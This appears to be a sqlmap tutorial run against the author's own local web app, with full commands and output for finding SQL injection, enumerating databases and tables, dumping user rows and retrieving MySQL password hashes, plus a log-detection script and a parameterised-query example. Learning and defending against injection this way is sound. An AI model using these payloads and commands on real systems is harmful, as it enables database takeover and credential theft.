Contents

  • sqlmap

  • Installation

  • Viewing the help

  • Chinese documentation

  • Connecting directly to a database

    • Server database (MySQL)
    • File database (SQLite)
  • Main usage

    • 1. Scan for injection points
    • 2. List all databases (--dbs) from the injection point
    • 3. List all tables in the specified database
    • List all columns in the specified table
    • 4. Dump the data in the table by column name
    • 5. Obtain the database users and password hashes
  • Finally

    • Resources

sqlmap

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. It comes with a powerful detection engine, many niche features for the experienced penetration tester, and a broad range of switches covering database fingerprinting, fetching data from the database, accessing the underlying file system, and executing commands on the operating system via out-of-band connections.

Installation

pip install sqlmap

Viewing the help

sqlmap -hh

Chinese documentation

sqlmap.campfire.ga/

Connecting directly to a database

Server database (MySQL)

DBMS://USER:PASSWORD@DBMS_IP:DBMS_PORT/DATABASE_NAME

sqlmap -d "mysql://root:PASSWORD@DBMS_IP:3306/uniapp_shop" -f --banner --dbs --users

File database (SQLite)

DBMS://DATABASE_FILEPATH

sqlmap -d "sqlite3://D:\apiTestDjango\db.sqlite3" -f --banner --dbs --tables

Main usage

The target is a local service; the purpose is only to learn how to use sqlmap, so please do not do anything illegal with it. Source code of the scanned project: gitee.com/zy7y/uniapp…

1. Scan for injection points

Command: sqlmap -u "http://127.0.0.1/v1/getnews?newid=1"

(venv) D:\sqlmaptools> sqlmap -u "http://127.0.0.1/v1/getnews?newid=1"
[sqlmap 1.5.5#pip banner, http://sqlmap.org]

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 13:34:37 /2021-05-14/

[13:34:37] [INFO] resuming back-end DBMS 'mysql'
[13:34:37] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: newid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: newid=13 AND 6236=6236

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: newid=13 AND (SELECT 8333 FROM (SELECT(SLEEP(5)))cUBu)

    Type: UNION query
    Title: Generic UNION query (NULL) - 5 columns
    Payload: newid=13 UNION ALL SELECT CONCAT(0x71786b7a71,0x664e6179557179534a494d4b7a6a4b4263744562646f716151716744516c75476f6774666345424e,0x716a6a7a71),NULL,NULL,NULL,NULL-- -
---
[13:34:37] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[13:34:37] [INFO] fetched data logged to text files under 'C:\Users\zy7y\AppData\Local\sqlmap\output\127.0.0.1'

[*] ending @ 13:34:37 /2021-05-14/

Note: the "Generic UNION query (NULL) - 5 columns" entry above is the injection point.
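From the defender's side, the three payload shapes sqlmap reported above (boolean-based, time-based and UNION) and its default User-Agent are what a web-server log review should flag. The following detector is an added example, not code from the post or from sqlmap; the access-log lines are constructed, and the regexes are heuristics rather than sqlmap's own signatures:

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed access-log lines (combined log format). The query strings carry the
# three payload shapes reported for the newid parameter; the first line is benign.
SAMPLE_LOG = """\
127.0.0.1 - - [14/May/2021:13:34:37 +0800] "GET /v1/getnews?newid=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
127.0.0.1 - - [14/May/2021:13:34:37 +0800] "GET /v1/getnews?newid=13%20AND%206236%3D6236 HTTP/1.1" 200 512 "-" "sqlmap/1.5.5#pip (http://sqlmap.org)"
127.0.0.1 - - [14/May/2021:13:34:38 +0800] "GET /v1/getnews?newid=13%20AND%20%28SELECT%208333%20FROM%20%28SELECT%28SLEEP%285%29%29%29cUBu%29 HTTP/1.1" 200 512 "-" "sqlmap/1.5.5#pip (http://sqlmap.org)"
127.0.0.1 - - [14/May/2021:13:34:44 +0800] "GET /v1/getnews?newid=13%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL--%20- HTTP/1.1" 200 512 "-" "sqlmap/1.5.5#pip (http://sqlmap.org)"
"""

# Request line, status, size, referer and user-agent of a combined-format log entry.
REQUEST_RE = re.compile(
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" \d+ \d+ "[^"]*" "(?P<ua>[^"]*)"'
)

# Heuristic indicators, matched against each URL-decoded query-parameter value.
INDICATORS = {
    "boolean-blind": re.compile(r"\bAND\s+\d+\s*=\s*\d+", re.I),   # e.g. AND 6236=6236
    "time-blind": re.compile(r"\bSLEEP\s*\(\s*\d+\s*\)", re.I),    # e.g. SLEEP(5)
    "union": re.compile(r"\bUNION\s+(ALL\s+)?SELECT\b", re.I),     # e.g. UNION ALL SELECT NULL,...
}


def classify_request(line):
    """Parse one log line; return path, the first parameter that matched, and the indicator labels."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    found, hit_param = [], None
    # parse_qsl percent-decodes values, so %20AND%206236%3D6236 becomes " AND 6236=6236".
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        for label, pat in INDICATORS.items():
            if pat.search(value) and label not in found:
                found.append(label)
                hit_param = hit_param or name
    if m.group("ua").lower().startswith("sqlmap/"):   # tool's default UA, unless the scanner changed it
        found.append("sqlmap-ua")
    return {"path": parts.path, "param": hit_param, "indicators": found}


def scan_log(text):
    """Return the classification of every line that carries at least one indicator."""
    alerts = []
    for line in text.splitlines():
        result = classify_request(line)
        if result and result["indicators"]:
            alerts.append(result)
    return alerts
```

Matching on the User-Agent alone is weak, since it is trivially changed; the payload patterns in the parameter values are the durable signal.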

2. List all databases (--dbs) from the injection point

Command: sqlmap -u "http://127.0.0.1/v1/getnews?newid=1" --dbs

(venv) D:\sqlmaptools> sqlmap -u "http://127.0.0.1/v1/getnews?newid=1" --dbs
[sqlmap 1.5.5#pip banner and legal disclaimer, as in step 1]

[*] starting @ 13:40:12 /2021-05-14/

[13:40:12] [INFO] resuming back-end DBMS 'mysql'
[13:40:12] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: newid (GET)
    (the same boolean-based blind, time-based blind and UNION query entries as in step 1)
---
[13:40:12] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[13:40:12] [INFO] fetching database names
available databases [6]:
[*] atplant
[*] information_schema
[*] mysql
[*] performance_schema
[*] sys
[*] uniapp_shop

[13:40:12] [INFO] fetched data logged to text files under 'C:\Users\zy7y\AppData\Local\sqlmap\output\127.0.0.1'

[*] ending @ 13:40:12 /2021-05-14/

3. List all tables in the specified database

Command: sqlmap -u "http://127.0.0.1/v1/getnews?newid=1" -D uniapp_shop --tables

(venv) D:\sqlmaptools> sqlmap -u "http://127.0.0.1/v1/getnews?newid=1" -D uniapp_shop --tables
[sqlmap 1.5.5#pip banner and legal disclaimer, as in step 1]

[*] starting @ 14:57:46 /2021-05-14/

[14:57:47] [INFO] resuming back-end DBMS 'mysql'
[14:57:47] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: newid (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: newid=1 AND (SELECT 3711 FROM (SELECT(SLEEP(5)))aMmf)

    Type: UNION query
    Title: Generic UNION query (NULL) - 5 columns
    Payload: newid=1 UNION ALL SELECT NULL,CONCAT(0x7162626b71,0x456a5258416472737a767a5a6d624b5448444b52745770566c4e67646c58666d474376737a6f476c,0x7170706271),NULL,NULL,NULL-- -
---
[14:57:47] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[14:57:47] [INFO] fetching tables for database: 'uniapp_shop'
Database: uniapp_shop
[36 tables]
+----------------------------+
| dt_article                 |
| dt_article_albums          |
| dt_article_attach          |
| dt_article_attribute_field |
| dt_article_attribute_value |
| dt_article_category        |
| dt_article_comment         |
| dt_brands                  |
| dt_channel                 |
| dt_channel_field           |
| dt_channel_site            |
| dt_express                 |
| dt_feedback                |
| dt_link                    |
| dt_mail_template           |
| dt_manager                 |
| dt_manager_log             |
| dt_manager_role            |
| dt_manager_role_value      |
| dt_navigation              |
| dt_order_goods             |
| dt_orders                  |
| dt_payment                 |
| dt_sms_template            |
| dt_user_amount_log         |
| dt_user_attach_log         |
| dt_user_code               |
| dt_user_group_price        |
| dt_user_groups             |
| dt_user_login_log          |
| dt_user_message            |
| dt_user_oauth              |
| dt_user_oauth_app          |
| dt_user_point_log          |
| dt_user_recharge           |
| dt_users                   |
+----------------------------+

[14:57:47] [INFO] fetched data logged to text files under 'C:\Users\zy7y\AppData\Local\sqlmap\output\127.0.0.1'

[*] ending @ 14:57:47 /2021-05-14/

List all columns in the specified table

Command: sqlmap -u "http://127.0.0.1/v1/getnews?newid=1" -D uniapp_shop -T dt_users --columns

(venv) D:\sqlmaptools> sqlmap -u "http://127.0.0.1/v1/getnews?newid=1" -D uniapp_shop -T dt_users --columns
[sqlmap 1.5.5#pip banner and legal disclaimer, as in step 1]

[*] starting @ 14:59:01 /2021-05-14/

[14:59:01] [INFO] resuming back-end DBMS 'mysql'
[14:59:01] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: newid (GET)
    (the same time-based blind and UNION query entries as in step 3)
---
[14:59:01] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[14:59:01] [INFO] fetching columns for table 'dt_users' in database 'uniapp_shop'
Database: uniapp_shop
Table: dt_users
[22 columns]
+-----------+--------------+
| Column    | Type         |
+-----------+--------------+
| exp       | int          |
| address   | varchar(255) |
| amount    | double       |
| area      | varchar(255) |
| avatar    | varchar(255) |
| birthday  | timestamp    |
| email     | varchar(50)  |
| group_id  | int          |
| id        | int          |
| mobile    | varchar(20)  |
| msn       | varchar(100) |
| nick_name | varchar(100) |
| password  | varchar(100) |
| point     | int          |
| qq        | varchar(20)  |
| reg_ip    | varchar(20)  |
| reg_time  | timestamp    |
| salt      | varchar(20)  |
| sex       | varchar(20)  |
| status    | int          |
| telphone  | varchar(50)  |
| user_name | varchar(100) |
+-----------+--------------+

[14:59:02] [INFO] fetched data logged to text files under 'C:\Users\zy7y\AppData\Local\sqlmap\output\127.0.0.1'

[*] ending @ 14:59:02 /2021-05-14/

4. Dump the data in the table by column name

Note: using --dump against other people's services is illegal; please do not attack others maliciously.

Command: sqlmap -u "http://127.0.0.1/v1/getnews?newid=1" --batch -D uniapp_shop -T dt_users -C user_name,id --dump

(venv) D:\sqlmaptools> sqlmap -u "http://127.0.0.1/v1/getnews?newid=1" --batch -D uniapp_shop -T dt_users -C user_name,id --dump
[sqlmap 1.5.5#pip banner and legal disclaimer, as in step 1]

[*] starting @ 15:03:52 /2021-05-14/

[15:03:52] [INFO] resuming back-end DBMS 'mysql'
[15:03:52] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: newid (GET)
    (the same time-based blind and UNION query entries as in step 3)
---
[15:03:52] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[15:03:52] [INFO] fetching entries of column(s) 'id,user_name' for table 'dt_users' in database 'uniapp_shop'
Database: uniapp_shop
Table: dt_users
[1 entry]
+-----------+----+
| user_name | id |
+-----------+----+
| test      | 1  |
+-----------+----+

[15:03:53] [INFO] table 'uniapp_shop.dt_users' dumped to CSV file 'C:\Users\zy7y\AppData\Local\sqlmap\output\127.0.0.1\dump\uniapp_shop\dt_users.csv'
[15:03:53] [INFO] fetched data logged to text files under 'C:\Users\zy7y\AppData\Local\sqlmap\output\127.0.0.1'

[*] ending @ 15:03:53 /2021-05-14/

5. Obtain the database users and password hashes

Command: sqlmap -u "http://127.0.0.1/v1/getnews?newid=1" --passwords

(venv) D:\sqlmaptools> sqlmap -u "http://127.0.0.1/v1/getnews?newid=1" --passwords
[sqlmap 1.5.5#pip banner and legal disclaimer, as in step 1]

[*] starting @ 14:40:02 /2021-05-14/

[14:40:02] [INFO] resuming back-end DBMS 'mysql'
[14:40:02] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: newid (GET)
    (the same boolean-based blind, time-based blind and UNION query entries as in step 1)
---
[14:40:02] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[14:40:02] [INFO] fetching database users password hashes
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
do you want to perform a dictionary-based attack against retrieved password hashes? [Y/n/q] y
[14:40:05] [WARNING] no clear password(s) found
database management system users password hashes:
[*] develop [1]:
    password hash: $A $005 $~ W \ \ u0005K \ \ u000b \ \ u0017d \ \ u0013 \ \ u0002 * 4 j_s Qg \ \ u0007 \ \ u0015 \ \ u0001GlIeJWW2iJzFpb0bGTlr5 6 kbd1haqt2iqefbubepkd
[*] mysql.infoschema [1]:
    password hash: $A$005$THISISACOMBINATIONOFINVALIDSALTANDPASSWORDTHATMUSTNEVERBRBEUSED
[*] mysql.session [1]:
    password hash: $A$005$THISISACOMBINATIONOFINVALIDSALTANDPASSWORDTHATMUSTNEVERBRBEUSED
[*] mysql.sys [1]:
    password hash: $A$005$THISISACOMBINATIONOFINVALIDSALTANDPASSWORDTHATMUSTNEVERBRBEUSED
[*] root [2]:
    password hash: $A$005$\\u0013`|dCsg\\u0001^)_s\\u001dL\\u0010n-jx^61Eh8FZrw86xs/5fy7xSwpJ9rmmaZ9iyou1PCK74aRC
    password hash: $A$005$z#r<]P\\u000eneGN\\u0014P_m\\u0007tk&av.YQwaEJ5AqX5Mv9.OiaWV/IlOiYM.C3veKIaAjpwq3

[14:40:05] [INFO] fetched data logged to text files under 'C:\Users\zy7y\AppData\Local\sqlmap\output\127.0.0.1'

[*] ending @ 14:40:05 /2021-05-14/
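Every step above worked because the newid value is pasted into the SQL text, so a boolean condition or a UNION in the parameter is executed as SQL. The following is an added example, not code from the post or from the scanned uniapp project: it shows that pattern beside the parameterised form that stops it. It uses Python's built-in sqlite3 as an in-memory stand-in for the MySQL backend, and the tables and rows are constructed (the hash is a placeholder):

```python
import sqlite3


def make_db():
    """In-memory stand-in for the application's news and dt_users tables (constructed data)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT);
        CREATE TABLE dt_users (id INTEGER PRIMARY KEY, user_name TEXT, password TEXT);
        INSERT INTO news VALUES (1, 'hello'), (13, 'launch');
        INSERT INTO dt_users VALUES (1, 'test', 'PLACEHOLDER-HASH');
    """)
    return conn


def get_news_vulnerable(conn, newid):
    """String-built query: whatever arrives in newid becomes part of the SQL statement."""
    return conn.execute(f"SELECT id, title FROM news WHERE id = {newid}").fetchall()


def get_news_safe(conn, newid):
    """Parameterised query: newid is bound as a value and is never parsed as SQL."""
    return conn.execute("SELECT id, title FROM news WHERE id = ?", (newid,)).fetchall()
```

With the vulnerable function, "13 AND 6236=6236" returns the row and "13 AND 6236=6237" returns nothing, which is exactly the true/false oracle behind sqlmap's boolean-based blind entry; with the safe function both strings are compared as a literal against the integer column and match nothing.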

Finally

Please do not use it maliciously to attack other people's services or break the law; for advanced usage, please consult the official documentation.

Resources

  • sqlmap Chinese documentation
  • SQL injection practice